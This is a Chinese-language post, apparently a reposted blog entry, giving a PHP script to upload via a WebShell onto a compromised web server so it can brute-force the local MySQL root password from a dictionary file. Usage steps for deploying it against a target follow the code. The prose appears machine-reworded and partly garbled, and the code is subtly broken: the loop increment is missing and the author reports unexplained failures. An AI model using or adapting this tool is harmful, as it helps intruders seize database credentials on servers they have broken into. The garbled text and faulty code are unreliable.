传入WebShell上来暴力破解密码本机的mysql数据库查询Root或其他客户的密码,由于是破译本机,因此 速率极快极其,好像还有点儿实际效果,这一之前有些人发表,这一就是我改了的。已经知道有一处Bug,不清楚为什么,密码数量少的情况下,准确率100%,可是当密码数量做到5000之上时,准确率0%,本来恰当……

复制代码编码以下:
<?
set_time_limit(0); //脚本制作不请求超时
$user="root"; //登录
$passwd=file("password.txt"); //密码词典
for($i=0;$i<count($passwd);$i ){
$pass=$passwd[$i];
connect($user,$pass);
flush();
}
echo "扫描仪完毕!";
function connect($user,$pass) {
$conn=@mysql_connect("localhost",$user,$pass);
if($conn){
echo "<font color='#0000FF'><b>获得密码:<font color='#FF0000'>".$pass."</font>!!!</b></font>";
exit();
}
else {
echo $pass.'
';
}
}
?>

编码简易的不可以再简易了,就无需多言了,作用非常简单,传入WebShell上来暴力破解密码本机的MySql数据库查询Root或其他客户的密码,由于是破译本机,因此 速率极快极其,好像还有点儿实际效果,这一之前有些人发表,这一就是我改了的。

已经知道有一处Bug,不清楚为什么,密码数量少的情况下,准确率100%,可是当密码数量做到5000之上时,准确率0%,本来恰当的密码,却无法显示恰当,除非是你将这一密码放到词典最结尾,才显示信息恰当,不清楚是怎么回事导致的,刚开始认为是爆破时间间隔过短,加了延时函数,還是那样。。。

也许仅仅我某些缘故?诸位试一下就知道。

使用方法

1、改动 PHP 编码中的登录名

2、提前准备词典 password.txt,每排一个,理论上适用成千上万行。

3、将脚本制作和词典一起传入总体目标Web服务端上,浏览该脚本制作,即刚开始暴力破解密码,破译結果即时輸出,盯住就可以了。